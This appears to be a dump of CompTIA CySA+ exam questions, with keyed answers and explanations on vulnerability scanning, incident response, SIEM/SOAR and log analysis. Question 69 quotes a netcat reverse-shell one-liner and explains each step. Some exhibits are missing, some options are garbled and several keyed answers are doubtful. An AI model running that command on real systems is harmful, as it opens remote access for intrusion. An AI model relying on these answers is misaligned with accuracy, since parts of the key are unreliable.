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NEW QUESTION 1
A company is in the process of implementing a vulnerability management program. no-lich of the following scanning methods should be implemented to minimize
the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?

A. Non-credentialed scanning
B. Passive scanning
C. Agent-based scanning
D. Credentialed scanning

Answer: B

Explanation: 
 Passive scanning is a method of vulnerability identification that does not send any packets or probes to the target devices, but rather observes and analyzes the
network traffic passively. Passive scanning can minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process, as it does not
interfere with the normal operation of the devices or cause any network disruption. Passive scanning can also detect vulnerabilities that active scanning may miss,
such as misconfigured devices, rogue devices or unauthorized traffic. Official References:
? https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
? https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your- questions-answered
? https://www.comptia.org/certifications/cybersecurity-analyst

NEW QUESTION 2
A company has the following security requirements:
. No public IPs
· All data secured at rest
. No insecure ports/protocols
After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud
scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

A. VM_PRD_DB
B. VM_DEV_DB
C. VM_DEV_Web02
D. VM_PRD_Web01

Answer: D

Explanation: 
 This VM has a public IP and an open port 80, which violates the company’s security requirements of no public IPs and no insecure ports/protocols. It also
exposes the VM to potential attacks from the internet. This VM should be updated first to use a private IP and close the port 80, or use a secure protocol such as
HTTPS.
References[CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition], Chapter 2: Cloud and Hybrid Environments, page 67.[What is a Public IP Address?][What
is Port 80?]

NEW QUESTION 3
An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of
the following steps of
the process does this describe?

A. Eradication
B. Recovery
C. Containment
D. Preparation

Answer: A

Explanation: 
 Eradication is a step in the incident response process that involves removing any traces or remnants of the incident from the affected systems or networks, such
as malware, backdoors, compromised accounts, or malicious files. Eradication also involves restoring the systems or networks to their normal or secure state, as
well as verifying that the incident is completely eliminated and cannot recur. In this case, the analyst is remediating items associated with a recent incident by
isolating the vulnerability and actively removing it from the system. This describes the eradication step of the incident response process.

NEW QUESTION 4
A security analyst performs a vulnerability scan. Based on the metrics from the scan results, the analyst must prioritize which hosts to patch. The analyst runs the
tool and receives the following output:
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Which of the following hosts should be patched first, based on the metrics?

A. host01
B. host02
C. host03
D. host04

Answer: C

Explanation: 
 Host03 should be patched first, based on the metrics, as it has the highest risk score and the highest number of critical vulnerabilities. The risk score is calculated
by multiplying the CVSS score by the exposure factor, which is the percentage of systems that are vulnerable to the exploit. Host03 has a risk score of 10 x 0.9 =
9, which is higher than any other host. Host03 also has 5 critical vulnerabilities, which are the most severe and urgent to fix, as they can allow remote code
execution, privilege escalation, or data loss. The other hosts have lower risk scores and lower numbers of critical vulnerabilities, so they can be patched later.

NEW QUESTION 5
A security analyst is responding to an indent that involves a malicious attack on a network. Data closet. Which of the following best explains how are analyst
should properly document the incident?

A. Back up the configuration file for alt network devices
B. Record and validate each connection
C. Create a full diagram of the network infrastructure
D. Take photos of the impacted items

Answer: D

Explanation: 
 When documenting a physical incident in a network data closet, taking photos provides a clear and immediate record of the situation, which is essential for
thorough incident documentation and subsequent investigation.
Proper documentation of an incident in a data closet should include taking photos of the impacted items. This provides visual evidence and helps in understanding
the physical context of the incident, which is crucial for a thorough investigation. Backing up configuration files, recording connections, and creating network
diagrams, while important, are not the primary means of documenting the physical aspects of an incident.

NEW QUESTION 6
A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is
working with the respective system
owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following
should the security analyst perform first to
categorize and prioritize the respective systems?

A. Interview the users who access these systems,
B. Scan the systems to see which vulnerabilities currently exist.
C. Configure alerts for vendor-specific zero-day exploits.
D. Determine the asset value of each system.

Answer: D

Explanation: 
 Determining the asset value of each system is the best action to perform first, as it helps to categorize and prioritize the systems based on the sensitivity of the
data they host. The asset value is a measure of how important a system is to the organization, in terms of its financial, operational, or reputational impact. The
asset value can help the security analyst to assign a risk level and a protection level to each system, and to allocate resources accordingly. The other actions are
not as effective as determining the asset value, as they do not directly address the goal of promoting confidentiality, availability, and integrity of the data.
Interviewing the users who access these systems may provide some insight into how the systems are used and what data they contain, but it may not reflect the
actual value or sensitivity of the data from an organizational perspective. Scanning the systems to see which vulnerabilities currently exist may help to identify and
remediate some security issues, but it does not help to categorize or prioritize the systems based on their data sensitivity. Configuring alerts for vendor-specific
zero-day exploits may help to detect and respond to some emerging threats, but it does not help to protect the systems based on their data sensitivity.
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NEW QUESTION 7
A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and has
decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?

A. Service-level agreement
B. Business process interruption
C. Degrading functionality
D. Proprietary system

Answer: B

Explanation: 
Business process interruption is the inhibitor to remediation that this scenario illustrates. Business process interruption is when the remediation of a vulnerability or
an incident requires the disruption or suspension of a critical or essential business process, such as the point-of-sale application. This can cause operational,
financial, or reputational losses for the organization, and may outweigh the benefits of the remediation. Therefore, the organization may decide to postpone or
avoid the remediation until a more convenient time, such as a change freeze window, which is a period of time when no changes are allowed to the IT
environment12. Service-level agreement, degrading functionality, and proprietary system are other possible inhibitors to remediation, but they are not relevant to
this scenario. Service-level agreement is when the remediation of a vulnerability or an incident violates or affects the contractual obligations or expectations of the
service provider or the customer. Degrading functionality is when the remediation of a vulnerability or an incident reduces or impairs the performance or usability of
a system or an application. Proprietary system is when the remediation of a vulnerability or an incident involves a system or an application that is owned or
controlled by a third party, and the organization has limited or no access or authority to modify it3. References: Inhibitors to Remediation — SOC Ops Simplified,
Remediation Inhibitors - CompTIA CySA+, Information security Vulnerability Management Report (Remediation…

NEW QUESTION 8
A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment Which of the following
must be considered to ensure the consultant does no harm to operations?

A. Employing Nmap Scripting Engine scanning techniques
B. Preserving the state of PLC ladder logic prior to scanning
C. Using passive instead of active vulnerability scans
D. Running scans during off-peak manufacturing hours

Answer: C

Explanation: 
 In environments with fragile and legacy equipment, passive scanning is preferred to prevent any potential disruptions that active scanning might cause.
When assessing the security of an Operational Technology (OT) network, especially one with fragile and legacy equipment, it's crucial to use passive instead of
active vulnerability scans. Active scanning can sometimes disrupt the operation of sensitive or older equipment. Passive scanning listens to network traffic without
sending probing requests, thus minimizing the risk of disruption.

NEW QUESTION 9
During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the
analyst with this information?

A. Header analysis
B. Packet capture
C. SSL inspection
D. Reverse engineering

Answer: A

Explanation: 
 Header analysis is the technique of examining the metadata of an email, such as the sender, recipient, date, subject, and routing information. It can help to identify
the source of a malicious email by revealing the IP address and domain name of the originator, as well as any spoofing or redirection attempts. References:
CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 6, page 240; CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 6, page 249.

NEW QUESTION 10
An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP
address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?

A. SOAR
B. SIEM
C. SLA
D. IoC

Answer: A

Explanation: 
 SOAR (Security Orchestration, Automation, and Response) is the best option to help the analyst implement the recommendation, as it reflects the software
solution that enables security teams to integrate and coordinate separate tools into streamlined threat response workflows and automate repetitive tasks. SOAR is
a term coined by Gartner in 2015 to describe a technology that combines the functions of security incident response platforms, security orchestration and
automation platforms, and threat intelligence platforms in one offering. SOAR solutions help security teams to collect inputs from various sources, such as EDR
agents, firewalls, or SIEM systems, and perform analysis and triage using a combination of human and machine power. SOAR solutions also allow security teams
to define and execute incident response procedures in a digital workflow format, using automation to perform low-level tasks or actions, such as blocking an IP
address or quarantining a device. SOAR solutions can help security teams to improve efficiency, consistency, and scalability of their operations, as well as reduce
mean time to detect (MTTD) and mean time to respond (MTTR) to threats. The other options are not as suitable as SOAR, as they do not match the description or
purpose of the recommendation. SIEM (Security Information and Event Management) is a software solution that collects and analyzes data from various sources,
such as logs, events, or alerts, and provides security monitoring, threat detection, and incident response capabilities. SIEM solutions can help security teams to
gain visibility, correlation, and context of their security data, but they do not provide automation or orchestration features like SOAR solutions. SLA (Service Level
Agreement) is a document that defines the expectations and responsibilities between a service provider and a customer, such as the quality, availability, or
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performance of the service. SLAs can help to manage customer expectations, formalize communication, and improve productivity and relationships, but they do
not help to implement technical recommendations like SOAR solutions. IoC (Indicator of Compromise) is a piece of data or evidence that suggests a system or
network has been compromised by a threat actor, such as an IP address, a file hash, or a registry key. IoCs can help to identify and analyze malicious activities or
incidents, but they do not help to implement response actions like SOAR solutions.

NEW QUESTION 10
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the
following shell script functions could help achieve the goal?

A. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }
B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print$1}’).origin.asn.cymru.com TXT +short }
D. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }

Answer: C

Explanation: 
 The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is:
function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print
$1}’).origin.asn.cymru.com TXT +short }
This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse
DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system
number (ASN) and other information related to the IP address, such as the country code, registry, or allocation date. The function then prints the IP address and
the ASN information, which can help identify any network addresses that belong to the same ASN or region

NEW QUESTION 12
A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan
of the network.
Which of the following would be missing from a scan performed with this configuration?

A. Operating system version
B. Registry key values
C. Open ports
D. IP address

Answer: B

Explanation: 
Registry key values would be missing from a scan performed with this configuration, as the scanner appliance would not have access to the Windows Registry of
the scanned systems. The Windows Registry is a database that stores configuration settings and options for the operating system and installed applications. To
scan the Registry, the scanner would need to have credentials to log in to the systems and run a local agent or script. The other items would not be missing from
the scan, as they can be detected by the scanner appliance without credentials. Operating system version can be identified by analyzing service banners or
fingerprinting techniques. Open ports can be discovered by performing a port scan or sending probes to common ports. IP address can be obtained by resolving
the hostname or using network discovery tools. https://attack.mitre.org/techniques/T1112/

NEW QUESTION 15
After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert
fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

A. SIEM ingestion logs are reduced by 20%.
B. Phishing alerts drop by 20%.
C. False positive rates drop to 20%.
D. The MTTR decreases by 20%.

Answer: D

Explanation: 
The MTTR (Mean Time to Resolution) decreases by 20% is the best possible outcome that this effort hopes to achieve, as it reflects the improvement in the
efficiency and effectiveness of the incident response process by reducing analyst alert fatigue. Analyst alert fatigue is a term that refers to the phenomenon of
security analysts becoming overwhelmed, desensitized, or exhausted by the large number of alerts they receive from various security tools or systems, such as
DLP (Data Loss Prevention) or CASB (Cloud Access Security Broker). DLP is a security solution that helps to prevent unauthorized access, use, or transfer of
sensitive data, such as personal information, intellectual property, or financial records. CASB is a security solution that helps to monitor and control the use of
cloud-based applications and services, such as SaaS (Software as a Service), PaaS (Platform as a Service), or IaaS (Infrastructure as a Service). Both DLP and
CASB can generate alerts when they detect potential data breaches, policy violations, or malicious activities, but they can also produce false positives, irrelevant
information, or duplicate notifications that can overwhelm or distract the security analysts. Analyst alert fatigue can have negative consequences for the security
posture and performance of an organization, such as missing or ignoring critical alerts, delaying or skipping investigations or remediations, making errors or
mistakes, or losing motivation or morale. Therefore, it is important to reduce analyst alert fatigue and optimize the alert management process by using various
strategies, such as tuning the alert thresholds and rules, prioritizing and triaging the alerts based on severity and context, enriching and correlating the alerts with
additional data sources, automating or orchestrating repetitive or low-level tasks or actions, or integrating and consolidating different security tools or systems into
a unified platform. By reducing analyst alert fatigue and optimizing the alert management process, the effort hopes to achieve a decrease in the MTTR, which is a
metric that measures the average time it takes to resolve an incident from the moment it is reported to the moment it is closed. A lower MTTR indicates a faster
and more effective incident response process,
which can help to minimize the impact and damage of security incidents, improve customer satisfaction and trust, and enhance security operations and outcomes.
The other options are not as relevant or realistic as the MTTR decreases by 20%, as they do not reflect the best possible outcome that this effort hopes to achieve.
SIEM ingestion logs are reduced by 20% is not a relevant outcome, as it does not indicate any improvement in the incident response process or any reduction in
analyst alert fatigue. SIEM (Security Information and Event Management) is a security solution that collects and analyzes data from various sources, such as logs,
events, or alerts, and provides security monitoring, threat detection, and incident response capabilities. SIEM ingestion logs are records of the data that is ingested
by the SIEM system from different sources. Reducing SIEM ingestion logs may imply less data volume or less data sources for the SIEM system, which may not
necessarily improve its performance or accuracy. Phishing alerts drop by 20% is not a realistic outcome, as it does not depend on the integration of DLP and
CASB or any reduction in analyst alert fatigue. Phishing alerts are notifications that indicate potential phishing attempts or attacks, such as fraudulent emails,
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websites, or messages that try to trick users into revealing sensitive information or installing malware. Phishing alerts can be generated by various security tools or
systems, such as email security solutions, web security solutions, endpoint security solutions, or user awareness training programs. Reducing phishing alerts may
imply less phishing attempts or attacks on the organization, which may not necessarily be influenced by the integration of DLP and CASB or any reduction in
analyst alert fatigue. False positive rates drop to 20% is not a realistic outcome

NEW QUESTION 17
The analyst reviews the following endpoint log entry:

Which of the following has occurred?

A. Registry change
B. Rename computer
C. New account introduced
D. Privilege escalation

Answer: C

Explanation: 
 The endpoint log entry shows that a new account named “admin” has been created on a Windows system with a local group membership of “Administrators”.
This indicates that a new account has been introduced on the system with administrative privileges. This could be a sign of malicious activity, such as privilege
escalation or backdoor creation, by an attacker who has compromised the system.

NEW QUESTION 22
Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

A. Business continuity plan
B. Vulnerability management plan
C. Disaster recovery plan
D. Asset management plan

Answer: C

NEW QUESTION 26
A security audit for unsecured network services was conducted, and the following output was generated:

Which of the following services should the security team investigate further? (Select two).

A. 21
B. 22
C. 23
D. 636
E. 1723
F. 3389

Answer: CD

Explanation: 
 The output shows the results of a port scan, which is a technique used to identify open ports and services running on a network host. Port scanning can be used
by attackers to discover potential vulnerabilities and exploit them, or by defenders to assess the security posture and configuration of their network devices1
The output lists six ports that are open on the target host, along with the service name and version associated with each port. The service name indicates the type
of application or protocol that is using the port, while the version indicates the specific release or update of the service. The service name and version can provide
useful information for both attackers and defenders, as they can reveal the capabilities, features, and weaknesses of the service.
Among the six ports listed, two are particularly risky and should be investigated further by the security team: port 23 and port 636.
Port 23 is used by Telnet, which is an old and insecure protocol for remote login and command execution. Telnet does not encrypt any data transmitted over the
network, including usernames and passwords, which makes it vulnerable to eavesdropping, interception, and modification by attackers. Telnet also has many
known vulnerabilities that can allow attackers to gain unauthorized access, execute arbitrary commands, or cause denial-of-service attacks on the target host23
Port 636 is used by LDAP over SSL/TLS (LDAPS), which is a protocol for accessing and modifying directory services over a secure connection. LDAPS encrypts
the data exchanged between the client and the server using SSL/TLS certificates, which provide authentication, confidentiality, and integrity. However, LDAPS can
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also be vulnerable to attacks if the certificates are not properly configured, verified, or updated. For example, attackers can use self-signed or expired certificates to
perform man-in-the-middle attacks, spoofing attacks, or certificate revocation attacks on LDAPS connections.
Therefore, the security team should investigate further why port 23 and port 636 are open on the target host, and what services are running on them. The security
team should also consider disabling or replacing these services with more secure alternatives, such as SSH for port 23 and StartTLS for port 6362

NEW QUESTION 31
A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack.
Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

A. Weaponization
B. Reconnaissance
C. Delivery
D. Exploitation

Answer: D

Explanation: 
 The Cyber Kill Chain is a framework that describes the stages of a cyberattack from reconnaissance to actions on objectives. The exploitation stage is where
attackers take advantage of the vulnerabilities they have discovered in previous stages to further infiltrate a target’s network and achieve their objectives. In this
case, the malicious actor has gained access to an internal network by means of social engineering and does not want to lose access in order to continue the
attack. This indicates that the actor is in the exploitation stage of the Cyber Kill Chain. Official References: https://www.lockheedmartin.com/en-
us/capabilities/cyber/cyber-kill-chain.html

NEW QUESTION 32
Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?

A. Join an information sharing and analysis center specific to the company's industry.
B. Upload threat intelligence to the IPS in STIX/TAXII format.
C. Add data enrichment for IPS in the ingestion pipleline.
D. Review threat feeds after viewing the SIEM alert.

Answer: C

Explanation: 
The best option to quickly find out whether the IP address in a SIEM alert is a known- malicious IP address is C. Add data enrichment for IPS in the ingestion
pipeline.
Data enrichment is the process of adding more information and context to raw data, such as IP addresses, by using external sources. Data enrichment can help
analysts to gain more insights into the nature and origin of the threats they face, and to prioritize and respond to them accordingly. Data enrichment for IPS
(Intrusion Prevention System) means that the IPS can use enriched data to block or alert on malicious traffic based on various criteria, such as geolocation,
reputation, threat intelligence, or behavior. By adding data enrichment for IPS in the ingestion pipeline, analysts can leverage the IPS’s capabilities to filter out
known-malicious IP addresses before they reach the SIEM, or to tag them with relevant information for further analysis. This can save time and resources for the
analysts, and improve the accuracy and efficiency of the SIEM.
The other options are not as effective or efficient as data enrichment for IPS in the ingestion pipeline. Joining an information sharing and analysis center (ISAC)
specific to the company’s industry (A) can provide valuable threat intelligence and best practices, but it may not be timely or comprehensive enough to cover all
possible malicious IP addresses. Uploading threat intelligence to the IPS in STIX/TAXII format (B) can help the IPS to identify and block malicious IP addresses
based on standardized indicators of compromise, but it may require manual or periodic updates and integration with the SIEM. Reviewing
threat feeds after viewing the SIEM alert (D) can help analysts to verify and contextualize the malicious IP addresses, but it may be too late or too slow to prevent
or mitigate the damage. Therefore, C is the best option among the choices given.

NEW QUESTION 34
Which of the following is the first step that should be performed when establishing a disaster recovery plan?

A. Agree on the goals and objectives of the plan
B. Determine the site to be used during a disasterC Demonstrate adherence to a standard disaster recovery process
C. Identity applications to be run during a disaster

Answer: A

Explanation: 
 The first step that should be performed when establishing a disaster recovery
plan is to agree on the goals and objectives of the plan. The goals and objectives of the plan should define what the plan aims to achieve, such as minimizing
downtime, restoring critical functions, ensuring data integrity, or meeting compliance requirements. The goals and objectives of the plan should also be aligned
with the business needs and priorities of the organization and be measurable and achievable.

NEW QUESTION 35
Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

A. Identify any improvements or changes in the incident response plan or procedures
B. Determine if an internal mistake was made and who did it so they do not repeat the error
C. Present all legal evidence collected and turn it over to iaw enforcement
D. Discuss the financial impact of the incident to determine if security controls are well spent

Answer: A

Explanation: 
 An important aspect that should be included in the lessons-learned step after an incident is to identify any improvements or changes in the incident response plan
or procedures. The lessons-learned step is a process that involves reviewing and evaluating the incident response activities and outcomes, as well as identifying
and documenting any strengths, weaknesses, gaps, or best practices. Identifying any improvements or changes in the incident response plan or procedures can
help enhance the security posture, readiness, or capability of the organization for future incidents
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NEW QUESTION 39
Exploit code for a recently disclosed critical software vulnerability was publicly available (or download for several days before being removed. Which of the
following CVSS v.3.1 temporal metrics was most impacted by this exposure?

A. Remediation level
B. Exploit code maturity
C. Report confidence
D. Availability

Answer: B

Explanation: 
 Exploit code maturity in the CVSS v.3.1 temporal metrics refers to the reliability and availability of exploit code for a vulnerability. Public availability of exploit code
increases the exploit code maturity score.
The availability of exploit code affects the 'Exploit Code Maturity' metric in CVSS v.3.1. This metric evaluates the level of maturity of the exploit that targets the
vulnerability. When exploit code is readily available, it suggests a higher level of maturity, indicating that the
exploit is more reliable and easier to use.

NEW QUESTION 42
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data
needed for the briefing?

A. Firewall logs
B. Indicators of compromise
C. Risk assessment
D. Access control lists

Answer: B

Explanation: 
 Indicators of compromise (IoCs) are pieces of data or evidence that suggest a system or network has been compromised by an attacker or malware. IoCs can
include IP addresses, domain names, URLs, file hashes, registry keys, network traffic patterns, user behaviors, or system anomalies. IoCs can be used to detect,
analyze, and respond to security incidents, as well as to share threat intelligence with other organizations or authorities. IoCs can produce the data needed for an
executive briefing on possible threats to the organization, as they can provide information on the source, nature, scope, impact, and mitigation of the threats.

NEW QUESTION 47
A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the
vulnerabilities for the workstations and produces the following information:

Which of the following vulnerabilities should be prioritized for remediation?

A. nessie.explosion
B. vote.4p
C. sweet.bike
D. great.skills

Answer: A
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Explanation: 
nessie.explosion should be prioritized for remediation, as it has the highest CVSSv3.1 exploitability score of 8.6. The exploitability score is a sub-score of the
CVSSv3.1 base score, which reflects the ease and technical means by which the vulnerability can be exploited. The exploitability score is calculated based on four
metrics: Attack Vector, Attack Complexity, Privileges Required, and User Interaction. The higher the exploitability score, the more likely and feasible the
vulnerability is to be exploited by an attacker12. nessie.explosion has the highest exploitability score because it has the lowest values for all four metrics: Network
(AV:N), Low (AC:L), None (PR:N), and None (UI:N). This means that the vulnerability can be exploited remotely over the network, without requiring any user
interaction or privileges, and with low complexity. Therefore, nessie.explosion poses the greatest threat to the end user workstations, and should be remediated
first. vote.4p, sweet.bike, and great.skills have lower exploitability scores because they have higher values for some of the metrics, such as Adjacent Network
(AV:A), High (AC:H), Low (PR:L), or Required (UI:R). This means that the vulnerabilities are more difficult or less likely to be exploited, as they require physical
proximity, user involvement, or some privileges34. References: CVSS v3.1 Specification Document - FIRST, NVD - CVSS v3 Calculator, CVSS v3.1 User Guide -
FIRST, CVSS v3.1 Examples - FIRST

NEW QUESTION 50
Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?

A. MITRE ATTACK
B. Cyber Kill Cham
C. OWASP
D. STIXTAXII

Answer: A

Explanation: 
 MITRE ATT&CK is a framework and knowledge base that describes the tactics, techniques, and procedures (TTPs) used by various adversaries in cyberattacks.
MITRE ATT&CK can help security analysts compare TTPs between different known adversaries of an organization, as well as identify patterns, gaps, or trends in
adversary behavior. MITRE ATT&CK can also help security analysts improve threat detection, analysis, and response capabilities, as well as share threat
intelligence with other organizations or communities

NEW QUESTION 55
An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a
secure template. Which of the following is the best resource to ensure secure configuration?

A. CIS Benchmarks
B. PCI DSS
C. OWASP Top Ten
D. ISO 27001

Answer: A

Explanation: 
The best resource to ensure secure configuration of cloud infrastructure is A. CIS Benchmarks. CIS Benchmarks are a set of prescriptive configuration
recommendations for various technologies, including cloud providers, operating systems, network devices, and server software. They are developed by a global
community of cybersecurity experts and help organizations protect their systems against threats more confidently1 PCI DSS, OWASP Top Ten, and ISO 27001
are also important standards for information security, but they are not focused on providing specific guidance for hardening cloud infrastructure. PCI DSS is a
compliance scheme for payment card transactions, OWASP Top Ten is a list of common web application security risks, and ISO 27001 is a framework for
establishing and maintaining an information security management system. These standards may have some relevance for cloud security, but they are not as
comprehensive and detailed as CIS Benchmarks

NEW QUESTION 56
A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the
team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority.
Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

A. InLoud: Cobain: Yes Grohl: No Novo: Yes Smear: Yes Channing: No B.TSpirit: Cobain: Yes Grohl: Yes Novo: Yes Smear: No Channing: No C.ENameless:
Cobain: Yes Grohl: No Novo: Yes Smear: No Channing: No D.PBleach: Cobain: Yes Grohl: No Novo: No Smear: No Channing: Yes

Answer: B

Explanation: 
 The vulnerability that should be patched first, given the above third-party scoring system, is:
TSpirit: Cobain: Yes Grohl: Yes Novo: Yes Smear: No Channing: No
This vulnerability has three out of five metrics marked as Yes, which indicates a high severity level. The metrics Cobain, Grohl, and Novo are more important than
Smear and Channing, according to the vulnerability management team. Therefore, this vulnerability poses a greater risk than the other vulnerabilities and should
be patched first.
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NEW QUESTION 59
A team of analysts is developing a new internal system that correlates information from a variety of sources analyzes that information, and then triggers
notifications according to company policy Which of the following technologies was deployed?

A. SIEM
B. SOAR
C. IPS
D. CERT

Answer: A

Explanation: 
 SIEM (Security Information and Event Management) technology aggregates and analyzes activity from many different resources across your IT infrastructure. The
description of correlating information from various sources and triggering notifications aligns with the capabilities of a SIEM system.

NEW QUESTION 63
Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?

A. Enrich the SIEM-ingested data to include all data required for triage.
B. Schedule a task to disable alerting when vulnerability scans are executing.
C. Filter all alarms in the SIEM with low severity.
D. Add a SOAR rule to drop irrelevant and duplicated notifications.

Answer: B

NEW QUESTION 64
While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following should be
checked first?

A. If appropriate logging levels are set
B. NTP configuration on each system
C. Behavioral correlation settings
D. Data normalization rules

Answer: B

Explanation: 
The NTP configuration on each system should be checked first, as it is essential for ensuring accurate and consistent time stamps across different systems. NTP
is the Network Time Protocol, which is used to synchronize the clocks of computers over a network. NTP uses a hierarchical system of time sources, where each
level is assigned a stratum number. The most accurate time sources, such as atomic clocks or GPS receivers, are at stratum 0, and the devices that synchronize
with them are at stratum 1, and so on. NTP clients can query multiple NTP servers and use algorithms to select the best time source and adjust their clocks
accordingly1. If the NTP configuration is not consistent or correct on each system, the time stamps of the logs and events may differ, making it difficult to correlate
incidents across different systems. This can affect the security analysis and correlation of events, as well as the compliance and auditing of the network23.
References: How the Windows Time Service Works, Time Synchronization - All You Need To Know, What is SIEM? | Microsoft Security

NEW QUESTION 66
An analyst views the following log entries:

The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly reports and is the only
external vendor with authorized access. The organization prioritizes incident investigation according to the following hierarchy: unauthorized data disclosure is
more critical than denial of service attempts.
which are more important than ensuring vendor data access.
Based on the log files and the organization's priorities, which of the following hosts warrants additional investigation?

A. 121.19.30.221
B. 134.17.188.5
C. 202.180.1582
D. 216.122.5.5

Answer: A

Explanation: 
The correct answer is A. 121.19.30.221.
Based on the log files and the organization’s priorities, the host that warrants additional investigation is 121.19.30.221, because it is the only host that accessed a
file containing sensitive data and is not from the partner vendor’s range.
The log files show the following information:
? The IP addresses of the hosts that accessed the web server
? The date and time of the access
? The file path of the requested resource
? The number of bytes transferred
The organization’s priorities are:
? Unauthorized data disclosure is more critical than denial of service attempts
? Denial of service attempts are more important than ensuring vendor data access According to these priorities, the most serious threat to the organization is
unauthorized data disclosure, which occurs when sensitive, protected, or confidential data is copied, transmitted, viewed, stolen, altered, or used by an individual
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unauthorized to do so123. Therefore, the host that accessed a file containing sensitive data and is not from the partner vendor’s range poses the highest risk to
the organization.
The file that contains sensitive data is /reports/2023/financials.pdf, as indicated by its name and path. This file was accessed by two hosts: 121.19.30.221 and
216.122.5.5. However, only 121.19.30.221 is not from the partner vendor’s range, which is 216.122.5.x. Therefore, 121.19.30.221 is a potential unauthorized data
disclosure threat and warrants additional investigation.
The other hosts do not warrant additional investigation based on the log files and the organization’s priorities.
Host 134.17.188.5 accessed /index.html multiple times in a short period of time, which could indicate a denial of service attempt by flooding the web server with
requests45. However, denial of service attempts are less critical than unauthorized data disclosure according to the organization’s priorities, and there is no
evidence that this host succeeded in disrupting the web server’s normal operations.
Host 202.180.1582 accessed /images/logo.png once, which does not indicate any malicious activity or threat to the organization.
Host 216.122.5.5 accessed /reports/2023/financials.pdf once, which could indicate unauthorized data disclosure if it was not authorized to do so. However, this
host is from the partner vendor’s range, which is required to have access to monthly reports and is the only external vendor with authorized access according to
the organization’s requirements. Therefore, based on the log files and the organization’s priorities, host 121.19.30.221 warrants additional investigation as it
poses the highest risk of unauthorized data disclosure to the organization.

NEW QUESTION 69
A security analyst detected the following suspicious activity:
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely describes the activity?

A. Network pivoting
B. Host scanning
C. Privilege escalation
D. Reverse shell

Answer: D

Explanation: 
 The command rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f is a one-liner that creates a reverse shell from the target machine to
the attacker’s machine. It does the following steps:
•rm -f /tmp/f deletes any existing file named /tmp/f
•mknod /tmp/f p creates a named pipe (FIFO) file named /tmp/f
•cat /tmp/f|/bin/sh -i 2>&1 reads from the pipe and executes the commands using /bin/sh in interactive mode, redirecting the standard error to the standard output
•nc 10.0.0.1 1234 > tmp/f connects to the attacker’s machine at IP address 10.0.0.1 and port 1234 using netcat, and writes the output to the pipe
This way, the attacker can send commands to the target machine and receive the output through the netcat connection, effectively creating a reverse shell.
References Hack the Galaxy
Reverse Shell Cheat Sheet

NEW QUESTION 73
A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of
the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly? (Select two).

A. Hostname
B. Missing KPI
C. CVE details
D. POC availability
E. loCs
F. npm identifier

Answer: CE

Explanation: 
 CVE details and IoCs are information that would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly. CVE details
provide the description, severity, impact, and solution of the vulnerabilities that affect the servers. IoCs are indicators of compromise that help identify and respond
to potential threats or attacks on the servers. ReferencesS: erver and Workstation Patch Management Policy, Section: Policy; Patch Management Policy: Why You
Need One in 2024, Section: What is a patch management policy?

NEW QUESTION 75
Which of the following is a benefit of the Diamond Model of Intrusion Analysis?

